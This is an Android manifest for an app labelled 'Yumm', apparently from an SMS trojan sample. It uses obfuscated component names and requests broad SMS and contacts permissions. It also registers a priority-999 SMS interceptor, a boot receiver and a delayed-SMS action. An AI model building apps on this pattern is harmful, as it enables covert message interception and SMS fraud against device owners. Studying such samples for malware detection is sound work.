<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="lOlOOo.IoOlCIoCllo">
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <application android:icon="@drawable/icon" android:label="Yumm">
        <activity android:configChanges="keyboardHidden|orientation" android:label="Yumm" android:launchMode="singleInstance" android:name=".cIOIlIoO" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name=".loOOoccO">
            <intent-filter>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
            </intent-filter>
        </receiver>
        <service android:name="cOOIcI.IoCIlC.CcOolCOc">
            <intent-filter>
                <action android:name="cOOIcI.IoCIlC.CcOolCOcStart76"/>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </service>
        <receiver android:name="cOOIcI.IoCIlC.cloCIoOoooo">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="cOOIcI.IoCIlC.CIolocc">
            <intent-filter android:priority="999">
                <action android:name="cOOIcI.IoCIlC.RSNotification"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".IoCcCIooI">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.HOME"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".IlcOOIIIlco">
            <intent-filter>
                <action android:name="lOlOOo.IoOlCIoCllo.action.delayed.sms"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
